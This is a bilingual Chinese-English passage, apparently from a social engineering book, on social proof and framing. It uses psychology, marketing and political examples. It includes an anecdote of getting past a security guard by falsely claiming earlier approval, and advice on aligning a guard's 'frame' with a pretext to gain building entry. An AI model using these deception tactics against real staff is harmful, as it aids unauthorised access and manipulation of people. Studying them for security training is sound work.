Subjects exposed to social models dissimulating tolerance or intolerance generally exhibit matching behavior in their verbal ratings of painful stimulation. It has been unclear, however, whether these changes reflect voluntary alteration of evidence or genuine changes in distress.

 

本研究采用了替代方法,并控制了早期研究的方法学局限性,通过检查非手掌皮肤电位以及手掌皮肤电导率和心率指数来表示对电击的心理生理反应,并通过感觉决策理论方法评估疼痛的言语表达。

This study used alternative measures and controlled for methodological limitations of earlier studies by examining non-palmar skin potential in addition to palmar skin conductance and heart rate indexes of psycho-physiological response to electric shock, and by evaluating verbal expressions of pain with sensory decision theory methodology.

 

耐受组的非手掌皮肤电位和心率反应的几个指标表现出较低的反应性。耐受模型还与主观压力的降低有关。结果与以下观点一致:与接触耐受模型相关的疼痛指数变化代表了疼痛体验基本特征的变化,而不是信息抑制。

Several indexes of non-palmar skin potential and heart rate reactivity exhibited lower reactivity in the tolerant group. Tolerant modeling was also associated with decreases in subjective stress. The results were consistent with the position that changes in pain indexes associated with exposure to a tolerant model represented variations in fundamental characteristics of painful experiences as opposed to suppression of information.

 

简而言之,他所做的基本上就是电击受试者并要求他们评估自己的疼痛程度。然后使用类似但不同的电击在对疼痛“耐受”的人面前进行同样的测试;这就像一件神奇的斗篷笼罩着受试者,因为他们现在对疼痛的耐受性更强了。

To boil this down, what he basically did was shock people and ask them to rate their pain level. Then using similar but varying shocks did the same test in the presence of a person who was “tolerant” to the pain; it was as if a magical cloak was over the subject, because they were now more tolerant to pain.

 

这项实验表明,表现出、展示或感受疼痛的部分动机与周围其他人的行为有关。研究中的人不仅仅是表现得好像疼痛减轻了:当耐受模型建立时,他们的皮肤反应和心率实际上表现出较少的疼痛反应。

This experiment points to the fact that part of the motivation to show, exhibit, or feel pain is related to how others around you act. The people in the study weren’t just acting like it hurt less: Their skin reactions and heart rate actually exhibited less pain reaction when a tolerant model was in place.

 

欲了解社会认同力量的幽默例子,请观看老电视节目《Candid Camera》中的视频,网址为www.social-engineer.org/framework/Influence_Tactics:_Consensus_or_Social_Proof

For a humorous example of the power of social proof, check out a video from the old television show Candid Camera at www.social-engineer.org/framework/Influence_Tactics:_Consensus_or_Social_Proof.

 

这段视频显示,受试者在电梯中被迫面朝不同方向,甚至一度面朝电梯后方,因为其他人都这样做。电梯中有四到五名参与者扮演乘客。每隔一段时间,参与者都会转向左侧、右侧或面朝后方。几秒钟后,隐藏的摄像头会拍到毫无戒心的受试者顺从并面朝同一方向、摘下帽子或采取其他行动。

This video shows subjects being influenced to face different directions in an elevator, even at one point facing toward the back because everyone else is doing it. There were four to five participants in the elevator acting as patrons. At set intervals, the participants would all turn to the left, to the right, or face backwards. After a few seconds, a hidden camera would catch the unsuspecting subject complying and facing the same direction, removing a hat, or taking some other action.

 

作为一名社会工程师,使用社会认同可能是一种致命的工具。这一原则可用于刺激一个人服从请求,方法是告知他或她许多其他人(也许是一些榜样)采取了你试图让这个人采取的行动或行为。社会认同可以提供一条确定如何行为的捷径。但与此同时,它可能使目标容易受到那些试图利用这种影响的人的操纵。

Using social proof as a social engineer can be a deadly tool. This principle can be used to stimulate a person’s compliance with a request by informing him or her that many other individuals, perhaps some who are role models, took the action or behavior you are trying to get this person to do. Social proof can provide a shortcut for determining how to behave. But at the same time it can make targets vulnerable to the manipulations of others who seek to exploit such influence.

 

社会认同在两种情况下最有影响力:

Social proof is most influential under two conditions:

 
 
     
  • 不确定性:当人们不确定且情况不明确时,他们更有可能观察他人的行为并接受该行为是正确的。
  • Uncertainty: When people are unsure and the situation is ambiguous they are more likely to observe the behavior of others and to accept that behavior as correct.
  •  
     
  • 相似性:人们更倾向于追随与自己相似的人的行为。
  • Similarity: People are more inclined to follow the lead of others who are similar to themselves.
  •  
 

这些情况正是社会工程师可以使用社会认同的地方。说明甚至暗示在此目标之前许多人已经采取了特定行动,可以增加成功的机会。

These conditions are where a social engineer can use social proof. Stating or even implying that many people before this target have taken a particular action can increase your chances of success.

 

在一次社会工程情况下,我被一名警惕的保安拦住,我只是装作不知道为什么被拦住,并说:“昨天,吉姆检查了我的所有证件后让我进去了。我只是觉得我的证件还在记录中。”

In one social engineering situation where I was stopped by a leery security guard, I simply acted confused as to why I was stopped and said, “Yesterday, Jim let me in after checking all my credentials. I just figured I was still on record.”

 

在场的保安听说吉姆批准了我,毫不犹豫地放我过去了。社会认同并不总是那么容易奏效,但它是一种非常强大的力量。

The present security guard, hearing that Jim approved me, allowed me to pass without question. Social proof won’t always work so easily, but it is a very powerful force.

 

本节概述的原则是当今使用的一些最致命的影响策略。这些策略实际上可以赋予社会工程师权力来激励人们、感动他们并使他们做出反应,从而使他们处于社会工程师的控制之下。

The principles outlined in this section are some of the deadliest influence tactics used today. These tactics can literally give a social engineer powers to motivate people, move them, and cause them to react in ways that will put them in the social engineer’s control.

 

请记住,影响力和说服的艺术是让别人按照希望的方式去做、做出反应、思考或相信的过程。在目标中创造这种动机是一种强大的力量;这是社会工程师的超能力。本章概述的原则可以使这种超能力成为现实,但并非没有后果和大量工作。

Remember that influence and the art of persuasion is the process of getting someone else to want to do, react, think, or believe in the way you want them to. Creating this motivation within a target is a powerful force; it is a social engineer’s superpower. The principles outlined in this chapter can make that superpower a reality, but not without consequence and lots of work.

 

我的意思是什么?我经常发现,在练习某项技能并熟练掌握后,“关闭”它非常困难。这种特质听起来很有吸引力,但谨慎对待你影响的人,尤其是作为一名社会工程师,是个好主意。要将这些技能根植于你的个性中,请用它们来帮助他人。例如,当你开始练习解读微表情,甚至用它们来操纵目标时,最初的反应可能是认为你拥有某种神秘的力量,让你几乎可以读懂别人的心思。这就是谨慎是明智的。练习技能并努力完善它,但不要以为你无所不知。

What do I mean by that? I have often found that after I practice a certain skill and become proficient at it, “turning it off” is very hard. This trait may sound attractive, but being cautious when it comes to who you are influencing, especially as a social engineer, is a good idea. To ingrain these skills into your personality, use them for helping others. For example, when you start to practice reading microexpressions and even using them to manipulate a target, the initial response might be to think you have some mystical power that allows you to almost read minds. This is where caution is wise. Practice the skill and work toward perfecting it, but don’t assume you know it all.

 

如果你能影响某人戒烟、开始锻炼或变得更健康,那么你将学会随意利用这些技能来造福他人,并且将它们运用到你的社会工程实践中并不是一个牵强的想法。

If you can influence someone to stop smoking, to start working out, or to be healthier, then you will learn to tap into these skills at will to benefit others, and using them in your social engineering practice is not a farfetched idea.

 

这些技能中的许多都要求你真正对他人感兴趣、关心他人并同情他人。如果这些不是你的天生能力,那么你必须努力获得这些技能。我敦促你花点时间,因为上一节中的技能可以让你成为一名大师级的社会工程师。

Many of these skills require you to actually be interested in people, care about them, and empathize with them. If these are not natural abilities for you, then you must work hard to obtain those skills. I urge you to take that time, because the skills in the preceding section can lead you to being a grand master social engineer.

 

想象一下,如果你能改变自己的想法,那么获得这些技能会更容易。现在再想象一下,如果你能改变目标的想法,那么他们所经历的正是你希望他们经历的。下一个话题是真正改变与你互动的人(包括你自己)的现实,这会让你大吃一惊。

Imagine you could alter what you think to the extent that gaining these skills could be easier. Imagine now, too, if you could alter the thinking of your targets so what they experience is exactly what you want them to experience. Literally altering the reality of those you interact with, including yourself, is the next topic, and it will just blow you away.

 

改变现实:框架

Altering Reality: Framing

 

框架被定义为生活中的信息和经历,它们会改变一个人对必须做出的决定的反应方式。从非社会工程学的角度来看,框架是你自己的亲身经历和他人的经历,你允许它们进入你的意识,从而改变你的决策方式。

Framing has been defined as information and experiences in life that alter the way one reacts to the decisions one must make. From a non–social engineer point of view, framing is your own personal experiences and the experiences of others that you allow into your conscious mind to alter the way you make decisions.

 

杂货店使用框架,在碎肉包装上标注“75% 瘦肉”,而不是“25% 脂肪”。这两个术语的意思是一样的(两者都有 25% 的脂肪含量),但其中一个听起来更健康,对买家更有吸引力,这就是为什么商店使用 75% 瘦肉而不是标注实际的脂肪含量。

Grocery stores use framing by putting “75% lean” on a package of ground meat as opposed to “25% fat.” These terms mean the same thing (both have 25% fat content) but one sounds healthier and is more appealing to the buyer, and that is why stores use 75% lean as opposed to labeling the actual fat content.

 

上述例子很简单,但也有助于展示框架的力量。只需以不同的方式呈现事实,就能让通常被认为是坏事的事情看起来好起来。

The preceding example is simple, but it is also one that helps to show the power of framing. Simply presenting the facts in a different way can make something seem good that would normally be considered bad.

 

以下部分将介绍一些经常使用框架的领域,以便您了解它的强大功能。

The following sections look at a few areas where framing is often used so you can see how powerful it is.

 

政治

Politics

 

框架在政治中早已被广泛使用。竞选活动或信息的措辞方式就能对公众对信息的理解产生巨大影响。

Framing has long been used in politics. Simply the way campaigns or messages are worded can make a huge difference in the way the public perceives a message.

 

例如,专业认知语言学家乔治·莱考夫 (George Lakoff) 就政治框架问题发表了有趣的见解,他指出,人们对“反恐是执法”和“反恐是战争”这两个短语的看法存在差异。9/11 袭击发生时,科林·鲍威尔 (Colin Powell) 认为,这些袭击应该被视为犯罪。当公众要求采取更多行动和更严格的政策时,布什总统宣布了“反恐战争”运动。

Consider, for example, George Lakoff, a professional cognitive linguist. In an interesting observation on framing in politics, he states the difference in how people perceive the use of the phrases “Counterterrorism as law enforcement” versus “Counterterrorism as war.” When the 9/11 attacks occurred, Colin Powell argued that they should be treated as crimes. When the public demanded more action and stricter policies, then President Bush announced the “War on Terror” campaign.

 

另一个例子是美国的社会保障计划,顾名思义,这个计划可以依赖它来为未来提供保障。

Another example is the Social Security program in the United States. The name implies that this program can be relied upon to provide security for the future.

 

另一个例子是“救助”“经济刺激”之间的区别。“救助”遭到很多反对,因为它可以用文字描述从沉船上捞水的情景。但“经济刺激”则用心理描述通过刺激经济来帮助经济。这两个计划几乎做了同样的事情,但措辞简单,使后者更容易被接受。

Yet another example is the difference in the terms bailout versus economic stimulus. Bailout met with lots of opposition because it can paint a word picture of bailing water out of a sinking boat. But economic stimulus paints the mental picture of helping the economy by stimulating the economy. Both programs did almost the same thing, but simple wording made the latter term more acceptable.

 

朱迪斯·巴特勒是伯克利大学教授,著有广受好评的《战争框架》一书。她撰写了一篇文章,探讨了西方文化中关于政治议程和战争的框架运用。 她在书中 探讨了媒体对国家暴力的描述:

Judith Butler, Berkeley professor and author of the critically acclaimed book Frames of War, wrote about how framing is used especially in western cultures when it comes to political agendas and war. In her book she explores the media’s portrayal of state violence:

 

这种描述充斥了我们对人类生命的理解,并导致了对整个民族的剥削和抛弃,他们被描绘成生存威胁,而不是需要保护的活着的群体。这些人被描绘成已经迷失的人,被监禁、失业和挨饿,很容易被忽视。在为他们的死亡找借口的扭曲逻辑中,这些人口的消失被认为是保护“活着的人”生命的必要条件。

This portrayal has saturated our understanding of human life, and has led to the exploitation and abandonment of whole peoples, who are cast as existential threats rather than as living populations in need of protection. These people are framed as already lost, to imprisonment, unemployment, and starvation, and can easily be dismissed. In the twisted logic that rationalizes their deaths, the loss of such populations is deemed necessary to protect the lives of “the living.”

 

这些只是框架在政治中的运用的几个例子。

These are just a few examples where framing is used in politics.

 

在日常生活中运用框架

Using Framing in Everyday Life

 

参考框架这一术语的定义是一组想法、条件或假设,它们决定了如何处理、感知或理解某件事。这一定义有助于理解框架的使用方式。

The term frame of reference is defined as a set of ideas, conditions, or assumptions that determine how something will be approached, perceived, or understood. This definition can be helpful in understanding how framing is used.

 

任何能够改变人们的看法或决策方式的因素都可以称为框架效应。一位朋友告诉你,上周她去城里,走了一条路,但这条路因为施工而堵塞了 10 英里。你可能会选择一条更长的路线来避免潜在的延误,即使你朋友分享的消息已经是一周前的消息了。

Anything that can alter people’s perceptions or the way they make decisions can be called framing. A friend tells you that last week she went to town and took a certain route that was backed up for 10 miles due to some construction. You might then take a longer route to avoid the potential delay, even though the news your friend shared is more than one week old.

 

我们的大脑天生不喜欢“杂乱”或混乱。当看到杂乱无章的东西时,我们的大脑会试图把它们整理得井井有条。图 6-3中有一个有趣的例子。

Our minds are designed to not like “clutter” or chaos. When presented with things that are cluttered our brains will try to make order out of them. One interesting example of this is found in Figure 6-3.

 

图 6-3:你能改变你的现实框架来改变你所看到的内容吗?

Figure 6-3: Can you alter your reality frame to change what you see?

 
f0603.eps
 

在你当前的框架中,什么是背景,什么是前景?你的大脑会坚持在事物中寻找熟悉的模式。我们在云、太空和无生命物体中这样做。人类也倾向于在这些事物中看到面孔。

In your present frame, what is the background and what is the foreground? Your minds will insist on finding familiar patterns in things. We do it in clouds, space, and inanimate objects. Humans also tend to see faces in these things.

 

图 6-4中,你能改变框架并改变图像和背景吗?试着将注意力集中在与你首先注意到的相反的事情上。

In Figure 6-4 can you alter your frame and change what is the image and what is the background? Try by focusing on the opposite of what you noticed first.

 

另一个非常有趣的例子是人类的大脑如何在混乱中找到秩序,它可以在过去几年流传的一封电子邮件中得到说明,如下所示:

Another very interesting example of how human brains find order in chaos can be illustrated in an e-mail that circulated over the last few years that looked like this:

 

只有 ny srmat poelpe 才能阅读它。

O lny srmat poelpe can raed tihs.

 

我相信我可能真的理解我所读的内容。人类思维的物理力量,与剑桥大学的研究有关,并不关心单词中单词的顺序,唯一的问题是第一个和最后一个单词在正确的位置。顺序可以是单词,你仍然可以阅读它,尽管有点问题。这是因为人类思维不是通过单词来阅读每个单词,而是将单词作为一个整体来阅读。好吗?是的,我每次打瞌睡都觉得很开心!如果你能读到这篇帖子就好了!!

I cdnuolt blveiee taht I cluod aulaclty uesdnatnrd waht I was rdanieg. The phaonmneal pweor of the hmuan mnid, aoccdrnig to a rscheearch at Cmabrigde Uinervtisy, it deosn’t mttaer in waht oredr the ltteers in a wrod are, the olny iprmoatnt tihng is taht the frist and lsat ltteer be in the rghit pclae. The rset can be a taotl mses and you can sitll raed it wouthit a porbelm. Tihs is bcuseae the huamn mnid deos not raed ervey lteter by istlef, but the wrod as a wlohe. Amzanig huh? yaeh and I awlyas tghuhot slpeling was ipmorantt! if you can raed tihs psas it on !!

 

我不确定这是否真的是剑桥的研究,但那封转发的电子邮件中有趣的部分是,我们中有多少以英语为主要语言或非常精通英语阅读的人可能能够毫不费力地阅读那一段,因为我们的大脑非常善于从混乱中理出秩序。

I am not sure whether this is actually Cambridge research, but the interesting part in that forwarded e-mail is how many of us who use English as our main language or are very proficient in reading English are probably able to read that paragraph without much effort, because our brains are very efficient at making order out of chaos.

 

很多时候,框架更加潜移默化。公司在营销中采用这种框架,希望潜意识信息能够改变目标客户对其产品的看法。很多时候,公司会使用微妙的框架措施来植入一个想法。

Many times the framing is more subliminal. Companies use this in marketing in hopes that the subliminal messages will alter the target’s perception of their product. Many times companies will use subtle measures of framing to plant an idea.

 

例如,图 6-4显示的内容您可能已经多次见过。

For example, Figure 6-4 shows something you probably have seen many times.

 

图 6-4:你能发现框架吗?

Figure 6-4: Can you spot the frame?

 
f0604.tif
 

在我向你展示这个之后,你再也不会以同样的方式看待联邦快递的标志了——联邦快递的标志里有一个箭头。在对标志设计者的采访中,他说他在标志中嵌入箭头是为了植入关于联邦快递服务的理念。它是为了传达运动、速度和公司的动态性质。

After I show you this, you will never see the FedEx logo the same way again—there is an arrow in the FedEx logo. In an interview with the creator of the logo, he said he embedded the arrow in the logo to plant an idea about FedEx’s services. It is there to communicate movement, speed, and the dynamic nature of the company.

 

你找到了吗?看图6-5,我在其中勾勒出了箭头的轮廓并画出了圆圈。

Did you find it yet? Look at Figure 6-5 where I outlined and circled the arrow.

 

图6-5:箭头表示始终在移动的优质服务。

Figure 6-5: The arrow indicates quality service that is always moving.

 
f0605.tif
 

联邦快递并不是唯一一家利用框架的公司。几十年来,各家公司一直在将信息嵌入徽标中,以框架思维来引导观众以他们想要的方式记住、思考和看待他们的公司。接下来的几张图展示了更多示例。

FedEx is not the only company that utilizes framing. For decades companies have been embedding messages into logos in an effort to frame the thinking of the viewer to remember, think, and view their company in the way they want. The next few figures show more examples.

 

你有没有注意到亚马逊的标志,因为它嵌入了框架信息(见图6-6)?

Did you ever notice Amazon’s logo for its embedded framing message (see Figure 6-6)?

 

图 6-6:你看到笑容满面的快乐顾客了吗?

Figure 6-6: Do you see the smiling happy customer?

 
f0606.tif
 

亚马逊的标志中包含两条信息。一条是作为顾客的幸福感,用图片中的微笑来表示,但微笑也是一支箭头。箭头从 A 指向 Z,表示亚马逊拥有从 A 到 Z 的一切。

Amazon has two framed messages in its logo. One is the happiness you will feel as a customer, represented by the smile in the image, but the smile is also an arrow. That arrow points from A to Z, indicating the Amazon has everything from both points and in between.

 

另一个很好的例子是 Tostitos 的标志。这是一个非常具有社交性的标志,如图6-7所示。

Another great example is the Tostitos logo. This is a very social logo, as you can see in Figure 6-7.

 

图 6-7:这个标志是否让你想与某人分享芯片?

Figure 6-7: Does this logo make you want to share a chip with someone?

 
f0607.tif
 

中间的两个 T 代表人们分享薯片和一碗莎莎酱。2004 年,Tostitos 发布了一份新闻稿,称“Tostitos 扮演着‘社交小吃’的角色,帮助建立朋友和家人之间的联系,无论是在派对上、‘大型比赛’期间,还是在简单的日常聚会上。新标志将建立联系的理念变为现实。”

The two T’s in the middle are people sharing a chip over a bowl of salsa. In 2004, Tostitos issued a press release that said, “Tostitos plays a role as a ‘social snack,’ helping to create connections between friends and families, whether it’s at a party, during the ‘big game,’ or at simple everyday get-togethers. The new logo brings to life this idea of making connections.”

 

这些例子只是框架在营销中的一小部分应用。框架并不全是关于形象;它更多地是关于目标客户感知到的价值。目标客户对一件商品的感知会增加或减少它的价值。以一家昂贵的服装店为例——当你走进去时,所有的东西都挂得很整齐、熨烫得很完美。人们可能会觉得这件衣服值这个价。然而,如果你从货架上拿下一条领带、衬衫或其他衣服;把它带到一家折扣店;然后扔进一个装满其他标着“75% 折扣”的衣服的大箱子里,你对这件衣服的价值的感知就会大大下降。

These examples are just a small subset of how framing is used in marketing. Framing is not all about images; mostly it is about the value that the target perceives. The perception that the target has of an item can increase or decrease its value. Take an expensive clothing store—when you walk in everything is hung neatly, pressed, and perfect. The perception can be that the clothing is worth the exorbitant amount of the price tag. Yet, if you were to take one of the ties, shirts, or other pieces of clothing off the rack; bring it to a discount store; and throw it into a large bin full of other clothes marked, “Discount 75% off” your perception of the value of that item of clothing would go way down.

 

营销大师们利用这一现象来塑造公众对价值的认知。许多公司在塑造公众价值方面取得了巨大成功,以至于人们甚至创造了一整套词语来描述产品。

Marketing gurus play off this phenomenon in an effort to frame the public’s perception of value. Many companies have been successful at framing to such an extent that people actually have coined phrases to create a whole genre of words to describe products.

 

例如,每个人都可能问过“你会把这个复印一下吗?”即使这台机器不是施乐的,而是另一个品牌的。施乐是品牌名称,而不是机器类型。

For example, everyone has probably said, “Will you make a Xerox of that?” even if the machine is not a Xerox but another brand. Xerox is the brand name, not the type of machine.

 

一个更近的例子是,无论你使用什么搜索引擎,人们经常会说“你用 Google 搜过吗?”因为 Google 已经成为了网络搜索的代名词。人们会说“请给我一张 Kleenex”,而实际上他们想要的是一张纸巾。

A more recent example is no matter what search engine you use, people often say, “Did you Google it?” because Google has become synonymous with searching on the Web. And people say, “Hand me a Kleenex please,” when really they want a tissue.

 

其他您可能不知道的品牌名称(除非您是这些品牌推出的那一代人)包括:

Others that you might not even be aware were brand names (unless you are of the generation in which they were introduced) include:

 
 
     
  • 阿司匹林是拜耳公司的注册产品。
  • Aspirin is a trademarked product of Bayer.
  •  
     
  • Thermos是 Thermos GmbH 公司的产品名称。
  • Thermos is a product name of Thermos GmbH Company.
  •  
     
  • Band-Aid是强生公司的商标。
  • Band-Aid is a trademark of Johnson & Johnson.
  •  
     
  • 飞盘是 Wham-O 的商标。
  • Frisbee was a trademark of Wham-O.
  •  
 

所有这些名字都变得如此流行,以至于人们的参考框架最终涵盖了任何与之类似的产品。我从不服用阿司匹林——我通常使用其他品牌——但我总是会要求“两片阿司匹林”,得到我使用的品牌,并且很高兴。

All of those names became so popular that people’s frame of reference eventually encompassed any product similar to it. I never take aspirin—I usually use another brand—but I will always ask for “two aspirin,” be given the brand I use, and be happy.

 

关于框架的信息很多,但将这些信息归结为社会工程师可以使用的一些主要原则是必要的。前面的信息非常详细地说明了框架是什么以及它在生活的不同领域是如何使用的。在进入社会工程领域之前,先看看不同类型的框架对齐。

Volumes of information exist about framing, but boiling down this information to some main principles you can use as a social engineer is necessary. The preceding information set a very detailed stage for what framing is and how it is used in different areas of life. Before moving to the social engineering arena, take a look at the different types of framing alignments.

 

四种类型的帧对齐

Four Types of Frame Alignment

 

亚利桑那大学的 David Snow 和内布拉斯加大学的 Robert Benford 两位研究人员撰写了一篇论文,题为“阐明社会运动研究中框架与意识形态的关系”(www.social-engineer.org/resources/book/SNOW_BED.pdf)。

Two researchers, David Snow from the University of Arizona and Robert Benford from the University of Nebraska, wrote a paper entitled, “Clarifying the Relationship Between Framing and Ideology in the Study of Social Movements” (www.social-engineer.org/resources/book/SNOW_BED.pdf).

 

斯诺和本福德认为,当各个框架以一致性和互补性的方式联系在一起时,就会发生框架对齐,从而产生框架共振,这是群体从一个框架过渡到另一个框架的关键。斯诺和本福德随后概述了影响框架构建努力的四个条件:

Snow and Benford argue that when individual frames become linked in congruency and complementariness, that frame alignment occurs, producing frame resonance, which is key to the process of a group transitioning from one frame to another. Snow and Benford then outline four conditions that affect framing efforts:

 
 
     
  • “框架工作的稳健性、完整性和彻底性”: Snow 和 Benford 确定了三个核心框架任务,而这些任务的关注程度将决定每个参与者的参与程度。
  • “The robustness, completeness, and thoroughness of the framing effort”: Snow and Benford identified three core framing tasks, and the degree to which these tasks are attended to will determine how much each participant gets involved.
  •  
 

这三个步骤是:

The three steps are:

 

1.诊断框架是否存在问题。

1. Diagnose the frame for problems.

2.分析并寻找解决方案。

2. Analyze it for solutions.

3.如果成功,则呼吁采取行动。

3. If successful, a call to action.

 

在构图上投入的努力越多,人们就越有机会号召被构图的人采取行动。
 
     
  • “提出的框架与更大的信仰体系之间的关系”:如果与核心信仰或信仰体系的价值不存在联系,人们往往会忽视框架或提出的框架。
  •  
 

The more effort put into the frame the better chance the person has to call those he is framing into action.
 
     
  • “The relationship between the proposed frame and the larger belief system”: People tend to discount frames or proposed frames if a link does not exist to a core belief or a value of their belief system.
  •  
 

 

试图说服一个认为吃肉是对动物残忍的人去街上一家有特色牛排店,这肯定会失败。框架必须与一个人的信念核心相吻合才能成功(除非你的目标是用框架来改变他或她的核心信念);这是成功的必要条件。

Trying to convince a person who holds a belief that eating meat is cruelty to animals to go to the steak place down the road that has a great special will certainly fail. The frame must fall with the core of a person’s beliefs to be successful (unless your goal is to use a frame to change his or her core beliefs); it is imperative to success.

 

一项大规模的框架改变尝试通过备受争议的反吸烟广告进行,志愿者在烟草业大楼前堆放尸袋。尸袋代表每分钟、每小时或每天有多少人死于吸烟。希望改变那些支持吸烟的人的框架,让他们考虑吸烟者的死亡人数。
 
     
  • “框架与参与者现实的相关性”:框架必须与人(目标)相关。它必须可信且可测试,因为它与目标的经验相关。
  •  
 

A large-scale framing change attempt was made through the controversial anti-smoking commercials where volunteers pile up body bags in front of a tobacco industry building’s front door. The body bags represent how many people die every minute, hour, or day from smoking. The hope is to alter the frame of those who support smoking to think about the death toll for those who smoke.
 
     
  • “Relevance of the frame to the realities of the participants”: The frame must be relevant to the person (target). It must be creditable and testable as it relates to the target’s experience.
  •  
 

 

你不能指望使用营销框架来鼓励人们在一个连一天的食物都买不起的地方乘坐豪华游轮。无论你在营销中多么擅长使用框架,它都只会失败。要使框架保持一致,它不仅必须相关,还必须可证明以保持价值,即使这种证明只是在目标人群的脑海中。

You can’t expect to use a marketing frame that will encourage people to take a luxury cruise in a land where people cannot afford food for the day. No matter how good you are at using framing in marketing, it just would fail. For the frame to align, it must not just be relevant but must also be provable in order to hold value, even if that proof is just in the mind of the target.

 

例如,2007 年,一家非常受欢迎且值得信赖的新闻媒体《洞察杂志》(与《华盛顿时报》同属一家公司)报道称,当时的总统候选人奥巴马曾就读于一所全穆斯林学校,该学校以教授非常激进和基本的伊斯兰教而闻名。当这则新闻发布时,许多人立刻相信了它——为什么?因为它符合他们的现实情况,看起来可信,而且来自一个“值得信赖”的消息来源。

For example, in 2007 a very popular and trusted news source, Insight Magazine (which is owned by the same company as The Washington Times) reported that then-presidential candidate Obama had attended an all-Muslim school that was known for teaching a very radical and fundamental form of Islam. When this news report was released many believed it right away—why? It fit into the frame of their reality, it seemed credible, and it came from a “trusted” source.

 

另一家信誉良好的新闻来源美国有线电视新闻网 (CNN) 派出调查人员,发现该报道为假,并报道了调查结果。

CNN, another reputable source for news, sent out investigators, discovered that story was false, and reported its findings.

 

这是利用非常值得信赖的“真相”来源——新闻媒体——来改变人们对某件事的看法的一个很好的例子。那些想相信奥巴马是激进穆斯林的人传播了这个故事,新闻变得疯狂。当研究表明这个故事是假的时,许多人的想法又被改变了。
 
     
  • “抗议的循环;框架在当前时代和对社会变革的现有关注的时间线上出现的点”:世界上发生的事情会影响社会框架。回想几年前;如果全身 X 射线扫描的想法被提出给美国或其他西方文化的公司,这个想法就会被抛诸脑后。
  •  
 

This is a good example of altering people’s frames on a matter using a very trusted source for “truth”—news media. People who wanted to believe that Obama was a radical Muslim ran with that story, and the news went wild. When research revealed the story to be false, many people’s thinking was altered again.
 
     
  • “Cycles of protest; the point at which the frame emerges on the timeline of the current era and existing preoccupations with social change”: What is happening in the world can affect a social frame. Think back a few years ago; if the idea of full body X-ray scans were proposed to companies in the U.S. or other Western cultures, the idea would have been thrown to the wind.
  •  
 

 

隐私保护活动人士本来会反对这一想法并取得胜利,他们只需要利用某人可以看到你的隐私部位并可能保存该照片来嘲笑或性骚扰你的想法。这一论点将压倒机器创造者的销售努力。然而,在美国发生 9 月 11 日袭击事件以及随后的恐怖活动增加之后,尽管活动人士呼吁,甚至以儿童色情法的力量为由,这些机器仍在全球各地的机场安装。

Activists for privacy would have fought against the idea and won, simply by using the idea of someone being able to see your private areas and potentially saving that picture to mock or sexually harass you. This argument would have outweighed the sales efforts of the creators of the machines. Yet, after the attacks in America on September 11 and the subsequent rise of terrorist activity, those machines are being installed at airports around the globe despite the cries by activists, even arguing with the power of child pornography laws on their side.

 

原因何在?因为如何保持安全的社会框架已经发生改变,从而允许新的决策产生。

Why? The social frame of how to remain safe has been altered, allowing a new breed of decision to enter.

 

斯诺和本福德认为,如果按照上述四点构建适当的框架,社会运动所需的大规模变革就可以通过框架协调来实现。他们的研究侧重于整个社会,但这些原则在处理较小规模甚至一对一时也同样有效。

Snow and Benford propose that when proper frames are constructed as described in these four points, large-scale changes in society such as those necessary for social movement can be achieved through frame alignment. Their studies focus on society as a whole, but these same principles are effective when dealing on a smaller scale or even one-to-one.

 

前面的讨论只是框架对齐的过程;实际上,在满足这四个条件后,可以发生四种不同类型的对齐。尽管其中许多方面都是针对整个框架群体的,但以下各节将从个人角度讨论这四种框架对齐,以展示如何在较小范围内使用它们,无论是作为社会工程师还是仅仅作为一个想要将框架与他人对齐的人。想象一下,试图将你进入建筑物的目标与旨在阻止你的保安人员的框架对齐。将他的框架与你的借口对齐可以确保成功。

The preceding discussion is just the process to frame alignment; actually four different types of alignment can occur after these four conditions are met. Although many of these aspects are geared towards framing groups as a whole, the following sections discuss these four framing alignments on a personal level that will show how you can use them on a smaller scale both as a social engineer and/or just as a person wanting to align frames with others. Imagine trying to align your goal of entry to a building with the frame of the security guard designed to stop you. Bringing his frame into alignment with your pretext can ensure success.

 

关于框架,有一点要记住,那就是它们从来都不是凭空构建的。框架总是建立在已经存在的文化规范之上,这些规范涉及一个人的信仰和经历的核心。了解这一点将影响你如何使用框架。

One thing to remember about frames is that they are never constructed from scratch. Frames are always drawn on already-existing cultural codes that involve the core of a person’s beliefs and experiences. Knowing this will affect how you use framing.

 

框架桥接

Frame Bridging

 

凯西·马什人口普查和调查信息中心将框架桥接定义为将两个或多个关于特定主题的意识形态一致但结构上不相连的框架联系起来。

The Cathie Marsh Centre for Census and Survey Information defines frame bridging as the linkage of two or more ideologically congruent but structurally unconnected frames regarding a particular topic.

 

搭桥并不是要诱使人们相信你的框架,而是要深入了解他们的框架,从而找到连接环节。然后,你利用这个连接环节将目标带入你的框架。

Bridging is not about tricking people into believing your frame as much as your understanding their frame so deeply that you find the connecting link. You then use that connecting link to bring a target into your frame.

 

情况可能是您想要进入某个区域、建筑物或获取信息。您的框架是您希望这种情况发生。您接近的人的框架不一定是阻止您;他甚至可能不知道您要尝试什么。如果您以这种框架来处理这种情况,您可能会提醒他注意问题,从而切断您的机会。

The situation could be that you want to gain access to an area, building, or piece of information. Your frame is that you want that to happen. The frame of the person you are approaching is not necessarily to stop you; he may not even know what you are going to attempt. If you were to approach the situation in that frame you may alert him to a problem and thereby shut down your chances.

 

通过了解目标的工作、角色和精神面貌,您可以了解他的心态,并可能找到一个联系,使他更容易地融入您的心态。

By understanding the target’s job, role, and mental outlook you can understand his frame of mind and maybe find a link that will make his transition into your frame much easier.

 

你的借口是什么?你即将接触的人会如何对待以你的借口对待他人?优秀的社交工程师必须了解这一点才能成功。“守门人”对待销售人员和汽水送货员的方式不同。了解目标的框架意味着知道他会如何对待你——不是你作为社交工程师,而是你作为借口。

What is your pretext? How would the person you are about to approach treat a person in your pretext? A good social engineer must understand this to be successful. The “gatekeeper” will treat a sales guy differently from the soda delivery guy. Understanding the frame of the target means knowing how he will treat you—not you as a social engineer, but you as the pretext.

 

一个更个人化的例子可能是想想你希望别人如何看待你——可能是很酷、很“团结”、聪明或自信。教授希望自己显得聪明。经理希望自己显得掌控一切。运动员希望自己显得冷静而坚强。喜剧演员希望观众认为她很有趣。所有这些都是一个人希望别人与之保持一致的框架。

A more personal example may be to think of how you want others to view you— maybe as cool, “together,” intelligent, or confident. A professor wants to appear smart. A manager wants to appear in control. An athlete wants to appear calm and strong. A comedian wants the audience to view her as funny. All of these are frames that a person wants others to be in alignment with.

 

